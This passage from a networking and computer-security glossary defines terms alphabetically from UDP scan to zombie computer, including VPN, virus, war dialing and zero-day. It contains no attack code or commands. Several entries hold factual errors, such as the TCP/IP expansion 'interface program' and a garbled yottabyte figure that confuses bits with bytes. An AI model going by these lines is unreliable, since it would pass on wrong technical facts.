A udp scan performs scans to determine which udp ports are open or vulnerable. Udp is a connectionless protocol so there is no equivalent to a tcp syn packet. However, if a udp packet is sent to a port that is not open, the system will respond with an icmp port unreachable message.
Unicast is defined as any communication between a single sender and a single receiver over a network. The term exists in contradiction to multicast, communication between a single sender and multiple receivers, and any cast, communication between any sender and the nearest of a group of receivers in a network.
Uniform resource identifier uri
A uniform resource identifier (uri) is a string of characters that are used to identify the name of a resource. Such identification enables interaction with representations of the resource over a network (such as the world wide web) using specific protocols. In other words, uri is the generic term for all types of names and addresses that refer to objects on the world wide web.
Uniform resource locator url
A uniform resource locator (url) is the global address of documents and other resources on the world wide web. The first part of the address indicates what protocol to use, and the second part specifies the ip address or the domain name where the resource is located. A url is a specific type of uniform resource identifier (uri), although many people use the two terms interchangeably. A url implies the means to access an indicated resource, which is not true of every uri. Urls occur most commonly to reference web pages (http), but are also used for file transfer (ftp), email (mailto), database access (jdbc), and many other applications.
Unix is a popular multi-user, multi-tasking operating system developed at Bell labs in the early 1970s by ken thompson, dennis ritchie, and others. Unix was designed to be a small, flexible system used exclusively by programmers.
Unprotected share
An unprotected share is a mechanism that allows a user to connect to file systems and printers on other systems. An unprotected share is one that allows anyone to connect to it.
User contingency plan
A user contingency plan is the alternative method of continuing business operations if its systems are unavailable.
User datagram protocol udp
The user datagram protocol (udp) is a communication protocol that, like tcp, runs on top of ip networks. The protocol was designed by david p. Reed in 1980 and formally defined in rfc 768. Udp uses a simple connectionless transmission model with a minimum of protocol mechanism. It is used primarily for broadcasting messages over a network. Udp uses the internet protocol to get a datagram from one computer to another but does not divide a message into packets (datagrams) and reassemble it at the other end. Udp doesn’t provide sequencing of the packets that the data arrives in.
A user is any person, organization entity, or automated process that accesses a system, whether authorized to do so or not. Users generally use a system or a software product without the technical expertise required to fully understand it.
Virtual private network vpn
A virtual private network (vpn) extends a private network across a public network, such as the internet. Vpn enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network. A vpn is created by establishing a virtual point-to-point connection through the use of dedicated connections, virtual tunneling protocols, or traffic encryption. For example, if a corporation has lans at several different sites, each connected to the internet by a firewall, the corporation could create a vpn by (a) using encrypted tunnels to connect from firewall to firewall across the internet and (b) not allowing any other traffic through the firewalls. A vpn is generally less expensive to build and operate than a dedicated real network, because the virtual network shares the cost of system resources with other users of the real network.
A virus is a hidden, self-replicating section of a computer software or program, usually malicious logic, that propagates by infecting, i.e., inserting a copy of itself into and becoming part of another program. A virus cannot run by itself and requires that its host program be run to make the virus active.
Voice firewall
A voice firewall is a physical discontinuity in a voice network that monitors, alerts, and controls inbound and outbound voice network activity based on user-defined call admission control (cac) policies, voice application layer security threats or unauthorized service use violations.
Voice intrusion prevention system vips
A voice intrusion prevention system (vips) is a security management system for voice networks that monitors voice traffic for multiple calling patterns or attack/abuse signatures to proactively detect and prevent toll fraud, denial of service, telecom attacks, service abuse, and other anomalous activities.
War chalking is marking areas, usually on sidewalks with chalk, that receive wireless signals to advertise an open wi-fi network. Warchalking was inspired by hobo symbols and was conceived by a group of friends in june 2002. They were published by matt jones who designed the set of icons and produced a downloadable document containing them.
War dialer
A war dialer is a computer program that automatically dials a series of telephone numbers to locate lines connected to computer systems, and catalogs those numbers so that a cracker or attacker can try to break into the systems.
War dialing
War dialing is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, bulletin board systems (computer servers), and fax machines.
Wardriving is searching for wi-fi wireless networks by an individual in a moving vehicle while using a portable computer, smartphone, or personal digital assistant (pda).
Web of trust
The web of trust is a concept that is used in pgp, gnupg, and other openpgp-compatible systems to establish the authenticity of the binding between a public key and its owner. Its decentralized trust model is an alternative to the centralized trust model of a public key infrastructure (PKI), which relies exclusively on a certificate authority.
Web server
A web server is a computer system that processes requests via http, the basic network protocol used to distribute information on the world wide web. Web server is used to refer either the entire system, or specifically to the software that accepts and supervises the http requests.
A whois is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an internet resource, such as a domain name, an ip address block, or an autonomous system. The protocol stores and delivers database content in a human-readable format. The whois protocol is documented in rfc 3912.
Windowing system
A windowing system is a system that is used for sharing a computer’s graphical display presentation resources among multiple applications at the same time. A windowing system uses a window manager to keep track of where each window is located on the display screen and its size and status. A windowing system doesn’t just manage the windows but also other forms of graphical user interface entities.
Windowing is the process of taking a small subset of a larger dataset for processing and analysis. In this approach, the rectangular window involves simply truncating the dataset before and after the window, while not modifying the contents of the window at all.
A windump is a freeware tool for windows that is a protocol analyzer that can monitor network traffic on a wire.
Wired equivalent privacy wep
Wired equivalent privacy (wep) is a security protocol for wireless local area networks defined in the standard ieee 802.11b. It was introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network. Wep, recognizable by the key of 10 or 26 hexadecimal digits, was at one time widely in use and was often the first security choice presented to users by router configuration tools.
Wireless application protocol
A wireless application protocol (wap) is a specification for a set of communication protocols to standardize the way that wireless devices, such as cellular telephones and radio transceivers, can be used for internet access, including e-mail, the world wide web, newsgroups, and internet relay chat. A wap browser is a web browser for mobile devices such as mobile phones that uses the protocol.
Wiretapping is the process of monitoring and recording data that is flowing between two points in a communication system.
World wide web the web www w3
The world wide web (www) is the global, hypermedia-based collection of information and services that is available on internet servers and is accessed by browsers using hypertext transfer protocol and other information retrieval mechanisms.
A worm is a computer program that can run independently, can propagate a complete working version of itself onto other hosts on a network, and may consume computer resources destructively.
X 400
X.400 was originally published in 1984 by ccitt and later re-written in 1988 jointly by iso and ccitt. X.400 is a standard that conforms to layer 7 of the osi and is a standard used for transporting e-mail messages. X.400 is an alternative standard to the commonly used smtp and includes support for several transport connections including ethernet, tcp/ip, and dial-up.
Xhtml is short for extensible hypertext markup language. Xhtml is a hybrid between xml and html and designed for network devices as a method of displaying web pages on network and portable devices. Xhtml was first released january 26, 2000.
Xml is short for extensible markup language. Xml is a specification developed by w3c starting with the recommendation on february 10, 1998. Xml is similar to html, xml uses tags to markup a document, allowing the browser to interpret the tags and display them on a page. Unlike html, xml language is unlimited (extensible) which allows self-defining tags and can describe the content instead of only displaying a page’s content. Using xml other languages such as rss and mathml have been created, even tools like xslt were created using xml.
Xmpp which stands for extensible messaging and presence protocol, is a communications protocol for messaging systems. It is based on xml, storing and transmitting data in that format. It is used for sending and receiving instant messages, maintaining buddy lists, and broadcasting the status of one’s online presence. Xmpp is an open protocol standard. Anyone can operate their own xmpp service, and use it to interact with any other xmpp service. The standard is maintained by xsf, the xmpp standards foundation.
Xmt is also called transmit. Xmt is the method of sending data to an alternate computer or device.
Xns is short for xerox network services, xns is a proprietary network communications protocol developed by xerox. Xns is no longer used and has been replaced by transmission control protocol / interface program (tcp/ip).
Y2k is short for the year 2000 bug or the millennium bug. Y2k is a warning first published by bob bemer in 1971 describing the issues of computers using a two-digit year date stamp.
A ymodem is a file-transfer protocol developed by Chuck Forsburg, that is similar to the enhanced 1k version of xmodem. Ymodem sends data in 1024-byte blocks, allows for multiple file transmissions at once, performs cyclic redundancy checks (crc), and can reduce the transfer size to compensate for poor connections.
Yottabyte is abbreviated as yb. A yottabyte is equal to 1,208,925,819,614,629,174,706,176 (280) bits, or 1,000,000,000,000,000,000,000,000 (1024) bytes and is the largest recognized value used with storage.
Zero day attack
A zero-day (or zero-hour or day zero) attack is a computer threat that attempts to manipulate the computer application vulnerabilities that are undisclosed to the software developer. Zero-day exploits is the actual code that can use a security hole to carry out an attack. These exploits are used or shared by attackers before the software developer knows about the vulnerability.
Zero day
The zero day or day zero is the day a new vulnerability is made known. In some cases, a zero day exploit is referred to an exploit for which no patch is available yet. Day one is a day at which the patch is made available.
A zombie computer is a computer connected to the internet that has been compromised by a hacker, a computer virus, or a trojan horse. Generally, a compromised machine is only one of many in a botnet, and is used to perform malicious tasks of one sort or another under remote direction.